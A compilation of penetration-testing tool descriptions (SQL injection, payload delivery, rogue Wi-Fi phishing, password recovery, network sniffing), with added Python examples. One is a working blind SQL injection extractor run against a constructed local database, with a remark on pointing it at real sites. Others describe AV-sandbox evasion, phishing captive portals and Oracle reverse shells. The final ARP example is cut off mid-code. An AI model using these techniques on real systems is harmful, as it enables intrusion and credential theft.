HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It can run SQL queries against, and brute-force credentials for, common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase can also route its traffic through proxies, or through a Metasploit pivot, to reach servers that are not directly accessible because they sit on internal subnets.
It runs on Linux and Windows with the following requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2
To install, run the following command in a terminal after changing directory to the path where the downloaded package is:
Smart Pentester is an SSH-based penetration testing framework. It provides a GUI for well-known tools such as nmap, hping, tcpdump, volatility and hydra.
Smart Pentester Framework gives you a user interface for penetration testing, malware analysis, forensic analysis, cyber intelligence, advanced packet generation techniques and more.
SmartSPLAT is freeware for troubleshooting Check Point firewall issues and performing management tasks.
It periodically checks for updates and, when a new release is published, updates itself from the SmartSPLAT web site.
SmartSPLAT connects to your firewall over SSH.
Critical commands (cpstop, kill, reboot, deleting a license, and similar commands that can leave the firewall unable to function) are coloured red, protected by checkboxes, and show a confirmation dialog before they run.
The project uses an SSH library based on the Poderosa project.
For file transfers SmartSPLAT uses PuTTY's pscp.exe; for SCP to work, the user must be listed in the /etc/scpusers file on the firewall.
SmartSPLAT ships a script named preparescp that checks whether the user is already listed in /etc/scpusers and, if not, adds a line for it.
The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a string that appears on the page when the query succeeds, it detects the injection and exploits it using either a union-based or a boolean-based technique.
Features
Supports injections against MySQL, SQL Server, PostgreSQL and Oracle databases.
Command line interface: different commands trigger different actions.
Auto-completion for commands, command arguments, and database, table and column names.
Support for filters to bypass certain IPS/IDS rules; generic filters are provided and new ones are easy to create.
Exploits SQL injections through GET/POST/Cookie parameters.
Developed in Python 3.
Exploits SQL injections that return binary data.
Powerful command interpreter to simplify its usage.
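The boolean-based technique described above, as an added example that is not The Mole's own code: an in-memory SQLite database stands in for the target, a deliberately vulnerable page concatenates the id parameter into its query, and the extractor learns data using nothing but whether the "valid string" (here the product name, a constructed value) appears in the response. The table names, column names and credentials are constructed for the example; SQLite's unicode()/substr() replace MySQL's ASCII()/SUBSTRING(), and the binary search over character codes is what keeps the request count to roughly seven per character instead of one per candidate.

```python
"""Boolean-based blind SQL injection against a constructed, intentionally vulnerable page."""
import sqlite3

VALID_STRING = "Widget"          # constructed: shows up only when the WHERE clause is true
PRINTABLE_LO, PRINTABLE_HI = 32, 126


def build_database() -> sqlite3.Connection:
    """Constructed sample data standing in for the target's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)", [(1, "Widget"), (2, "Gadget")])
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret!"), (2, "bob", "hunter2")])
    return con


def vulnerable_page(con: sqlite3.Connection, product_id: str) -> str:
    """The target: interpolates ?id= straight into SQL (intentionally unsafe, never do this)."""
    try:
        rows = con.execute(f"SELECT name FROM products WHERE id = {product_id}").fetchall()
    except sqlite3.Error:
        return "<h1>Internal error</h1>"
    return f"<h1>{rows[0][0]}</h1>" if rows else "<h1>Not found</h1>"


class BlindExtractor:
    """Asks the page yes/no questions and turns the answers into data."""

    def __init__(self, con: sqlite3.Connection):
        self.con = con
        self.requests = 0

    def ask(self, condition: str) -> bool:
        """Inject 'id=1 AND (<condition>)'; the valid string is present only if it holds."""
        self.requests += 1
        return VALID_STRING in vulnerable_page(self.con, f"1 AND ({condition})")

    def detect(self) -> bool:
        """Injectable if a true predicate keeps the string and a false one removes it."""
        return self.ask("1=1") and not self.ask("1=2")

    def _binary_search(self, predicate: str, lo: int, hi: int) -> int:
        # predicate has one '{}' slot; returns the smallest v in [lo, hi] for which
        # '<expr> > v' is false, i.e. the value of <expr> itself (if it lies in range).
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(predicate.format(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, expr: str, max_len: int = 64) -> str:
        """Extract the string value of a scalar SQL expression, e.g. a subquery."""
        length = self._binary_search(f"length({expr}) > {{}}", 0, max_len)
        chars = []
        for pos in range(1, length + 1):
            code = self._binary_search(f"unicode(substr({expr}, {pos}, 1)) > {{}}",
                                       PRINTABLE_LO, PRINTABLE_HI)
            chars.append(chr(code))
        return "".join(chars)


if __name__ == "__main__":
    db = build_database()
    x = BlindExtractor(db)
    print("injectable:", x.detect())
    print("admin password:", x.extract("(SELECT password FROM users WHERE username = 'admin')"))
    print("requests used:", x.requests)
```

Against a real site the `ask()` method is the only part that changes: it becomes an HTTP request with the payload in the GET, POST or Cookie parameter, and the check stays "is the valid string in the body".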
Dradis is an open source framework to enable effective information sharing, especially during security assessments. It is a tool built specifically to help in the process of penetration testing. Penetration testing is about information:
Information discovery
Exploit useful information
Report the findings
But penetration testing is also about sharing the information you and your teammates gather. Failing to share the available information effectively results in lost exploitation opportunities and duplicated effort.
Dradis is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead.
Features
Easy report generation.
Support for attachments.
Integration with existing systems and tools through server plugins.
Platform independent.
Traditional pentesting teams face different types of challenges regarding information sharing. Different tools provide output in different formats, different testers capture evidence in different ways, different companies report differently, etc.
If you do not use a tool to share the information, every tester will use their own notes file to keep track of their findings. Each will store this file locally, or on a shared resource, but the information will not arrive immediately to the rest of the team.
If you want to know your teammate's latest findings, you have to go looking for their notes file. You can also try talking, but talking is not effective when you need a specific cookie value or the exact SQL query for an injection attack.
It seems reasonable that some effort should be put into increasing the quality and efficiency of this process.
Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and Base64-encoded before transmission.
Changelog: Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation.
Features
Encrypted communications: Maligno is a web server that talks to its clients over HTTP or HTTPS. Communications are encrypted with AES and encoded with Base64 on both HTTP and HTTPS, and the encryption and encoding parameters are configurable. Clients do NOT validate the server certificate by default, so the TLS layer alone will not stop an interception proxy; the AES layer, whose parameters the generated client carries, is what keeps the payload from being read on the wire.
On-the-fly shellcode generation, per session: Maligno generates shellcode at start-up and caches it for the rest of the session, serving the cached shellcode to every client that requests it. One cache is kept per configured Metasploit payload, and the caches are discarded when Maligno shuts down.
Multi-payload support: Maligno can be configured with several Metasploit payloads. Clients request a particular one by index, passed as a GET parameter whose name is also configurable.
Multi-server support: Maligno can run on the same host as Metasploit or on a separate machine. Clients connect to Maligno, and the shellcode Maligno generates points at a pre-configured Metasploit multi-handler.
SOCKS4a proxy support: Maligno helps you start a Metasploit auxiliary socks4a proxy, which can be used with payloads such as reverse_https_proxy to send all your traffic through the Maligno server in a multi-server environment.
Scope definition: Maligno accepts single IP addresses or ranges, so shellcode is served only to machines involved in your pentest. A wildcard accepts ANY address.
Last-resort redirection: hosts that are out of scope, or that send invalid requests, are redirected to a configured URL.
Client code generator and pseudorandom obfuscator: a bundled script generates ready-to-use client code from your server configuration and obfuscates it pseudorandomly.
Delayed client execution: clients wait a basic random delay before executing, in an attempt to outlast AV sandboxes.
Metasploit resource file generator: Maligno generates MSF resource files from your configuration, ready to use with msfconsole.
OAuth Request Crafter is a tool that helps you work with OAuth signature-protected URLs.
Features
Supports GET, POST, PUT and DELETE
Proxies the request
Tamper with the URL, parameters and headers on the go
Add additional headers and cookies
Why ?
When dealing with OAuth signature-protected URLs, every request you tamper with or re-issue needs a fresh, valid signature and nonce: you have to generate them with some tool and add the resulting parameters to the request in your proxy before it will succeed.
This is a pain because it has to be done manually for every single request.
OAuth Request Crafter solves that problem by automating the whole process.
Provide it with the consumer key and consumer secret, and optionally the OAuth token and token secret.
Then make requests, tampering with the URL, parameters and headers on the go.
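The signing step the tool automates, written out as an added example (not OAuth Request Crafter's code): an OAuth 1.0a HMAC-SHA1 signer per RFC 5849 that builds the signature base string from the method, the base URL and every query, body and oauth_* parameter, signs it with consumer_secret&token_secret and returns the Authorization header. Because the base string covers the URL and all parameters, any tampering changes the signature, which is why each modified request has to be re-signed with a fresh nonce. The worked values are the request-signing example from the OAuth Core 1.0 specification (Appendix A), whose fixed nonce and timestamp make the signature reproducible; the function and parameter names are this example's own.

```python
"""OAuth 1.0a HMAC-SHA1 request signing (RFC 5849), stdlib only."""
import base64
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qsl, quote, urlsplit


def pct(value: str) -> str:
    """RFC 5849 section 3.6 percent-encoding: only ALPHA / DIGIT / '-' '.' '_' '~' stay literal."""
    return quote(str(value), safe="-._~")


def base_string_uri(url: str) -> str:
    """Scheme and host lower-cased, default port dropped, query removed (section 3.4.1.2)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = parts.hostname.lower()
    default_port = {"http": 80, "https": 443}.get(scheme)
    netloc = host if parts.port in (None, default_port) else f"{host}:{parts.port}"
    return f"{scheme}://{netloc}{parts.path or '/'}"


def normalize_parameters(pairs) -> str:
    """Encode every name and value, sort by name then value, join as k=v&k=v (section 3.4.1.3.2)."""
    encoded = sorted((pct(k), pct(v)) for k, v in pairs)
    return "&".join(f"{k}={v}" for k, v in encoded)


def signature_base_string(method: str, url: str, pairs) -> str:
    return "&".join([method.upper(), pct(base_string_uri(url)), pct(normalize_parameters(pairs))])


def sign_request(method, url, consumer_key, consumer_secret,
                 token=None, token_secret="", body_params=None, nonce=None, timestamp=None):
    """Return (authorization_header, base_string, signature) for one request."""
    oauth = {
        "oauth_consumer_key": consumer_key,
        "oauth_nonce": nonce or secrets.token_hex(16),     # fresh per request; servers reject replays
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": str(timestamp or int(time.time())),
        "oauth_version": "1.0",
    }
    if token:
        oauth["oauth_token"] = token
    # Everything the server will see is signed: query string, form body and the oauth_*
    # parameters (except oauth_signature).  parse_qsl decodes the query so values are
    # percent-encoded exactly once in the base string.
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    pairs += list((body_params or {}).items()) + list(oauth.items())
    base = signature_base_string(method, url, pairs)
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()   # token_secret may be empty
    signature = base64.b64encode(hmac.new(key, base.encode(), hashlib.sha1).digest()).decode()
    oauth["oauth_signature"] = signature
    header = "OAuth " + ", ".join(f'{pct(k)}="{pct(v)}"' for k, v in sorted(oauth.items()))
    return header, base, signature


# Worked vector: OAuth Core 1.0 Appendix A.5 (photos.example.net) with its fixed nonce/timestamp.
SPEC_EXAMPLE = dict(
    method="GET",
    url="http://photos.example.net/photos?file=vacation.jpg&size=original",
    consumer_key="dpf43f3p2l4k3l03", consumer_secret="kd94hf93k423kf44",
    token="nnch734d00sl2jdk", token_secret="pfkkdhi9sl3r4s00",
    nonce="kllo9940pd9333jh", timestamp=1191242096,
)

if __name__ == "__main__":
    header, base, sig = sign_request(**SPEC_EXAMPLE)
    print(base)
    print(sig)      # tR3+Ty81lMeYAr/Fid0kMTYa/WM=
    print(header)
```

Changing `size=original` to `size=large` and re-running `sign_request` yields a different signature; that is the whole reason a proxy-based tamper has to recompute the header for every edit rather than replaying the captured one.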
WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.
After retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the 'Save Selected Items' option (Ctrl+S).
System Requirements And Limitations
This utility works on any version of Windows, starting from Windows 2000, and up to Windows 8, including 64-bit systems. Older versions of Windows (Windows 98/ME) are not supported, because this utility is a Unicode application.
Currently, WebBrowserPassView cannot retrieve passwords that are protected with a master password. Support for master passwords will probably be added in future versions.
Currently, WebBrowserPassView cannot retrieve passwords from an external hard drive. Support for that might be added in future versions.
On Internet Explorer 7.0-9.0, the passwords are encrypted with the URL of the Web site, so WebBrowserPassView uses the history file of Internet Explorer to decrypt the passwords. If you clear the history of Internet Explorer, WebBrowserPassView won't be able to decrypt the passwords.
On Google Chrome - passwords originally imported from Internet Explorer 7.0-9.0, cannot be decrypted.
OWASP iOSForensic is a Python tool to help with forensic analysis of iOS devices. It retrieves files and logs, extracts SQLite3 databases and converts binary .plist files to XML.
OWASP iOSForensic provides:
Application's files
Conversion of .plist files to XML
Extract all databases
Conversion of binary cookies
Application's logs
A List of all packages
Extraction of multiple packages
Options
-h --help : show help message
-a --about : show information
-v --verbose : verbose mode
-i --ip : local IP address of the iOS device
-p --port : SSH port of the iOS device (default 22)
-P --password : root password of the iOS device (default alpine, the factory default that jailbroken devices with OpenSSH installed keep unless the owner changes it)
Daphne is a small application for killing, controlling and debugging Windows processes. It was born to kill a Windows process and grew into an almost complete Task Manager replacement. You can kill a process by dragging the mouse over its window, by right-clicking the process in the main process list, or by typing its name with the "Kill all by name" command. You can set any window to be always on top, transparent, enabled, and so on. The main window displays a list of the currently running processes with detailed information: CPU usage, process ID, process name, full path (and arguments), priority, class (process/service), current memory usage, peak memory usage, current swap usage, peak swap usage and number of threads.
You can hide applications, tweak programs' GUIs and inspect detailed process information.
New in Daphne v2.02:
Copy the process list to the clipboard in CSV format
Explorer integration adds extras
Set window size numerically (e.g. 640x648)
Trap window size and position
Schedule a popup message
Handle min/max process working-set size
Drag and drop to find a window in the process windows tree
Fix: Explorer integration: 'Open CMD' now shows for both folders and files
Fix: the installer removes the previous version automatically
Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
Features
Wireshark has a rich feature set which includes the following:
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
Capture files compressed with gzip can be decompressed on the fly
Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
Coloring rules can be applied to the packet list for quick, intuitive analysis
Output can be exported to XML, PostScript®, CSV, or plain text
Browser Password Remover is free software that quickly displays and removes all website login passwords stored by popular browsers.
Most web browsers offer to remember passwords and store them in a local database file. That file, and every password in it, can be read by anyone able to run programs as the user who saved them, which on a shared computer or a public terminal such as one in an internet cafe means whoever sits down next.
Browser Password Remover helps you automatically list and remove any such stored passwords from all the popular browsers.
Currently supported web browsers:
Firefox
Internet Explorer [v7.x - v10.x]
Google Chrome
Google Chrome Canary/SXS
CoolNovo Browser
Opera Next
Comodo Dragon Browser
SeaMonkey Browser
SRWare Iron Browser
Flock Browser
One unique feature of this tool is that it can remove the stored login passwords of any user on the local system, or from another computer.
Before removing the passwords, you can also back up the recovered passwords in HTML/XML/text format.
Browser Password Remover is fully portable and works on both 32-bit and 64-bit platforms from Windows XP to Windows 8.
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle databases remotely. Typical uses of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)
Features
With ODAT you can:
search for valid SIDs on a remote Oracle database listener via:
a dictionary attack
a brute force attack
the listener's ALIAS
search for Oracle accounts using:
a dictionary attack
each Oracle username as its own password (requires an account before this attack can be used)
execute system commands on the database server using:
DBMS_SCHEDULER
JAVA
external tables
oradbg
download files stored on the database server using:
UTL_FILE
external tables
CTXSYS
upload files on the database server using:
UTL_FILE
DBMS_XSLPROCESSOR
DBMS_ADVISOR
delete files using:
UTL_FILE
send/receive HTTP requests from the database server using:
UTL_HTTP
HttpUriType
scan ports of the local server or a remote server using:
A bash script to launch a soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server-side PHP scripts for sniffing/phishing. Can act as a multi-client captive portal using PHP and iptables. Launches classic exploits such as evil PDF. Deauthenticates clients with aireplay, airdrop-ng or MDK3.
Usage
Basic Menu
1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc.; no internet access is given
2) Grab WPA handshake
3) Sniffing: provide internet access, then be MITM
4) Simple web server with dnsspoof: redirect the victim to your webpage
5) Karmetasploit
6) Browser_autopwn
1) Relies on auto-connections, i.e. the device connects without the owner being aware. You can then attempt to exploit it. Set the fake AP's ESSID to something the device has likely connected to previously, e.g. Starbucks WiFi.
2) Sometimes it is quicker to steal the handshake than to sniff it passively. Set up the AP with the same name and channel as the target, then deauthenticate (DoS) the target so its clients reconnect to you. Airbase saves a pcap containing the handshake to /root/PwnSTAR-n.cap.
3) Provides an open network, so you can sniff the victim's activities.
4) Uses Apache to serve a web page. There is an option to load your own page, e.g. one you have cloned. The provided page (hotspot_3) asks for email details. Note that the client is forced to the page by DNS spoofing and can only proceed to the internet once you manually stop dnsspoof; DNS caching on the client is a problem with this technique. The captive portal in the advanced menu is a much better way of hosting hotspot_3.
5&6) Provides all the config files to properly set-up Karmetasploit and Browser_autopwn.
Advanced Menu
a) Captive portals (phish/sniff)
b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)
c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
d) Java_jre17_jmxbean
e) Choose another browser exploit
a) Uses iptables rules to route the clients. This is a fully functioning captive portal that can track and block/allow multiple connections simultaneously, and it avoids the problems of DNS spoofing. There are two built-in web options:
1) Serves hotspot3. Does not allow clients onto the internet until credentials have been given.
2) Allows you to add a personal header to the index.php. You could probably copy the php functions from this page onto a cloned page, and load that instead.
b) A captive portal which blocks the client until they have downloaded a PDF. This PDF carries a malicious Java applet. A clean PDF is included to which you can add your own payload.
c&d) Launches a couple of example browser exploits
e) Gives a skeleton framework for loading any browser exploit of your choice. Edit PwnSTAR browser_exploit_fn directly for more control.
SysExporter utility allows you to grab the data stored in standard list-views, tree-views, list boxes, combo boxes, text-boxes, and WebBrowser/HTML controls from almost any application running on your system, and export it to text, HTML or XML file.
Here's some examples for data that you can export with SysExporter:
The files list inside archive file (.zip, .rar, and so on) as displayed by WinZip or 7-Zip File Manager.
The files list inside a folder.
The event log of Windows.
The list of emails and contacts in Outlook Express.
The Registry values displayed in the right pane of the Registry Editor.
The data displayed by SysInternals utilities (Registry Monitor, File Monitor, Process Explorer, and others.)
The text inside a standard message-box of Windows.
The HTML inside any instance of Internet Explorer.
Using SysExporter
This utility is a standalone executable, so it doesn't require any installation process or additional DLLs. Just run the executable (sysexp.exe) and start using it. There is only one exception: If you want to run this utility on Windows NT, you should download the 'psapi.dll', and copy it into the system32 folder. The main window of SysExporter contains 2 panes:
The upper pane displays the list of current opened windows that are available for export.
When you select a single window in the upper pane, the lower pane displays all the data you can export from it. For example, if you select the 'My Computer' window in the upper pane, the lower pane lists all your disks exactly as they appear in the original 'My Computer' window.
You can select one or more items from the lower pane and export them to text, HTML or XML files. You can also copy the exported data to the clipboard in tab-delimited format (Ctrl+C) and paste it directly into Excel or any other application that supports this format. Before exporting, you can change the order of the columns that will appear in the saved files with the 'Choose Columns' option.
Practical Example
Let's say that you want to export the list of all files in your C:\Windows folder to Excel:
First, open the 'C:\Windows' folder (or any other folder that you want to export).
In the top pane of SysExporter, find the window of 'C:\Windows' folder and select it. If you cannot find this window, try to refresh the list by pressing F5 key.
After selecting the desired window in the top pane, the files list of this window will be loaded to the lower pane.
Select the files in the lower pane that you want to export. (Press Ctrl+A in order to select all files)
Press Ctrl+C to copy the selected items to the clipboard. (The exported items are copied in tab-delimited format.)
In Excel, go to the position where you want the exported data and press Ctrl+V to paste it into your worksheet.
Mail Password Decryptor is free software to instantly recover mail account passwords from popular email clients and other desktop applications.
You can recover lost passwords for email accounts such as Gmail, Yahoo Mail, Hotmail or Windows Live Mail from email applications such as Microsoft Outlook, Thunderbird, IncrediMail, GTalk and many more.
Mail Password Decryptor automatically crawls through each of these applications and instantly recovers all of the stored mail account passwords.
It is a very handy tool not only for penetration testers but also for forensic investigators.
It works on both 32-bit and 64-bit platforms from Windows XP to Windows 8.
Features
The current version supports password recovery from the following email clients and desktop apps:
Microsoft Outlook Express
Microsoft Outlook 2002/XP/2003/2007/2010/2013
Mozilla Thunderbird
Windows Live Mail 2012
IncrediMail
Foxmail v6.x - v7.x
Windows Live Messenger
MSN Messenger
GTalk
GMail Notifier
PaltalkScene IM
Pidgin (Formerly Gaim) Messenger
Miranda Messenger
Windows Credential Manager
Unique features:
Automatically detects and decrypts stored encrypted passwords from popular email clients and desktop applications.
Password recovery from the latest versions of the supported applications.
Recovers passwords of any length and complexity.
Automatically discovers all supported applications and recovers all the stored passwords.
Saves the recovered password list to an HTML/XML/text/CSV file.
Easier and faster to use with its enhanced, user-friendly GUI.
Supports local installation and uninstallation of the software.
screenFetch is a "Bash Screenshot Information Tool": a Bash script that generates the terminal theme information plus ASCII distribution logo seen in so many desktop screenshots. It auto-detects your distribution, displays an ASCII version of that distribution's logo, and prints useful system information to the right of it. Options allow disabling the ASCII art, changing colors, taking a screenshot when the information is displayed, and even customizing the screenshot command. The script is easy to add to and extend.
Running screenfetch
To run screenFetch, open a terminal and type the command screenFetch, or the path to wherever you saved the script. This generates an ASCII logo with the information printed beside it. The options that may be specified on the command line are shown below, or by running screenFetch -h:
-v Verbose output.
-o 'OPTIONS' Allows setting script variables on the command line. Must be in the following format: 'OPTION1="OPTIONARG1";OPTION2="OPTIONARG2"'
-n Do not display the ASCII distribution logo.
-N Strip all color from output.
-t Truncate output based on terminal width (experimental).
-s(m) Take a screenshot. Add m (-sm) to move it to a new location afterwards.
-c string Change the output colors. The format is [0-9][0-9],[0-9][0-9]: the first argument controls the ASCII logo and label colors, the second the colors of the information found. Either argument may be used without the other.
-S 'COMMAND' Specify a custom screenshot command for the script to execute. Surrounding quotes are required.
-D 'DISTRO' Specify the distribution for the script to use. Surrounding quotes are required.
-A 'DISTRO' Specify the distribution art to display, for when you want your distro detected but a different logo shown.
-E Suppress error output.
-V Display the current script version.
-h Display this help.
Moscrack is a Perl application designed to crack WPA keys in parallel across a group of computers.
This is accomplished using either the Mosix clustering software, or SSH or RSH access to a number of nodes.
With Moscrack's plugin framework, hash cracking is also possible: SHA256/512, DES, MD5 and Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin.
Some of Moscrack's features:
Basic API allows remote monitoring
Automatic and dynamic configuration of nodes
Live CD/USB enables boot and forget dynamic node configuration
Can be extended by use of plugins
Uses aircrack-ng (including 1.2 Beta) by default
CUDA/OpenCL support via Pyrit plugin
CUDA support via aircrack-ng-cuda (untested)
Does not require an agent/daemon on nodes
Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin
Checkpoint and resume
Easily supports a large number of nodes
Designed to run for long periods of time
Doesn't exit on errors/failures when possible
Supports mixed OS/protocol configurations
Supports SSH, RSH, Mosix for node connectivity
Effectively handles mixed fast and slow nodes or links
Architecture independent
Supports Mosix clustering software
Supports all popular operating systems as processing nodes
Node prioritization based on speed
Nodes can be added/removed/modified while Moscrack is running
Failed/bad node throttling
Hung node detection
Reprocessing of data on error
Automatic performance analysis and tuning
Intercepts INT and TERM signals for clean handling
Very verbose, doesn't hide anything, logs aggressively
Includes a "top" like status viewer
Includes CGI web status viewer
Includes an optional basic X11 GUI
Compatibility
Moscrack itself should work with any Un*x variant, but it is developed and tested on Linux.
Tested platforms for SSH based end nodes:
Moscrack Live CD (SUSE)
Ubuntu Linux 12.10 x86 64bit
Ubuntu Linux 12.04.2 x86 64bit
Ubuntu Linux 10.10 x86 64bit
Ubuntu Linux 10.10 x86 32bit
CentOS Linux 5.5 x86 32bit
FreeBSD 8.1 x86 64bit
Windows Vista Business 64bit w/Cygwin 1.7.7-1
Windows Vista Business 64bit w/Cygwin 1.7.9
Mac OS X 10.5.6 (iPC OSx86)
Solaris Express 11 x64
iPhone 3g iOS 3.2.1 (Jailbroken)
Samsung Galaxy S2 SGH-I727R (Cyanogenmod 10 + Linux chroot)
WhoIsConnectedSniffer is a network discovery tool that listens to packets on your network adapter through a capture driver (WinPcap or Microsoft Network Monitor) and accumulates a list of the computers and devices currently connected to your network. It uses various protocols to detect them, including ARP, UDP, DHCP, mDNS and BROWSER.
For every detected computer or device, the following information is displayed: (Some of the fields might be empty if the information cannot be found inside the packets) IP Address, MAC Address, name of the device/computer, description, Operating System, Network Adapter Company, IPv6 Address.
After collecting the connected computers/devices information, you can easily export the list to tab-delimited/comma-delimited/xml/html file.
Start Using WhoIsConnectedSniffer
Apart from the capture driver, WhoIsConnectedSniffer doesn't require any installation process or additional DLL files. To start using it, simply run the executable file, WhoIsConnectedSniffer.exe.
When you run WhoIsConnectedSniffer for the first time, choose the capture driver and the network adapter you want to use.
Once you have chosen them, WhoIsConnectedSniffer starts listening to the packets on that adapter and updates the main window whenever a device or computer is detected.
Expect to wait from a few seconds to a few minutes until the first computers/devices appear in the main window.
After collecting the connected computers/devices information, you can easily export the list to tab-delimited/comma-delimited/xml/html file by selecting all items (Ctrl+A), and then using the 'Save Selected Items' option (Ctrl+S).
Protocols supported by WhoIsConnectedSniffer
ARP: WhoIsConnectedSniffer listens to this protocol to learn the IP address and MAC address of computers and devices.
UDP: When a computer broadcasts a UDP packet to all other computers, WhoIsConnectedSniffer extracts the IP address and MAC address from it.
DHCP: When a computer joins the network it usually sends a DHCP request; WhoIsConnectedSniffer uses this request to get the computer's host name and IP address.
mDNS: This protocol is used by Linux and Mac OS systems. WhoIsConnectedSniffer uses it to get the host name and IP address of the computer, and also the operating system (on Linux).
BROWSER: This protocol is mainly used by Windows, but some Linux systems (e.g. those running Samba) support it too. WhoIsConnectedSniffer uses it to get the computer's name, its description text and its operating system.
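What the ARP entry above amounts to in code, as an added example that is not WhoIsConnectedSniffer's own: a parser for raw Ethernet frames (untagged or 802.1Q-tagged) that returns the (IP, MAC) pairs an ARP packet actually proves exist on the segment, plus a table that accumulates them. Two details matter in practice and are handled here: an ARP probe (RFC 5227 duplicate-address detection) carries sender IP 0.0.0.0 and must not be recorded, and the target fields of a request are a question rather than a fact, whereas in a reply both ends are real hosts. The frames are constructed inline with `build_arp_frame()`; on a live system the bytes would come from a capture driver such as WinPcap or libpcap instead.

```python
"""Learn (ip, mac) pairs from raw ARP frames, including VLAN-tagged ones."""
from __future__ import annotations

import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ETH_P_8021Q = 0x8100
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")   # htype ptype hlen plen oper sha spa tha tpa


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp_frame(frame: bytes) -> list[tuple[str, str]]:
    """Return [(ip, mac), ...] learned from one frame; [] if it is not a usable ARP frame."""
    if len(frame) < 14:
        return []
    ethertype = struct.unpack("!H", frame[12:14])[0]
    offset = 14
    if ethertype == ETH_P_8021Q:             # VLAN tag: 2-byte TCI, then the real ethertype
        if len(frame) < 18:
            return []
        ethertype = struct.unpack("!H", frame[16:18])[0]
        offset = 18
    if ethertype != ETH_P_ARP or len(frame) < offset + ARP_HDR.size:
        return []
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, offset)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):   # Ethernet / IPv4 ARP only
        return []
    learned = []
    sender_ip = str(IPv4Address(spa))
    # RFC 5227 probe: the MAC is real but the host has no address yet, so nothing to record.
    if sender_ip != "0.0.0.0":
        learned.append((sender_ip, mac_str(sha)))
    # Request target = a question; reply target = the host that asked, so record it.
    if oper == ARP_REPLY:
        learned.append((str(IPv4Address(tpa)), mac_str(tha)))
    return learned


class HostTable:
    """ip -> mac, updated from every frame fed to it."""

    def __init__(self):
        self.hosts: dict[str, str] = {}

    def feed(self, frame: bytes) -> None:
        for ip, mac in parse_arp_frame(frame):
            self.hosts[ip] = mac


def build_arp_frame(oper, sha, spa, tha, tpa, vlan_id=None) -> bytes:
    """Construct a sample frame (test data for this example, not captured traffic)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    dst = mac("ff:ff:ff:ff:ff:ff") if oper == ARP_REQUEST else mac(tha)
    tag = struct.pack("!HH", ETH_P_8021Q, vlan_id) if vlan_id is not None else b""
    eth = dst + mac(sha) + tag + struct.pack("!H", ETH_P_ARP)
    return eth + ARP_HDR.pack(1, 0x0800, 6, 4, oper, mac(sha), IPv4Address(spa).packed,
                              mac(tha), IPv4Address(tpa).packed)


SAMPLE_FRAMES = [   # constructed: request, its reply, a DAD probe, a tagged request, non-ARP
    build_arp_frame(ARP_REQUEST, "00:11:22:33:44:55", "192.168.1.10",
                    "00:00:00:00:00:00", "192.168.1.1"),
    build_arp_frame(ARP_REPLY, "aa:bb:cc:dd:ee:01", "192.168.1.1",
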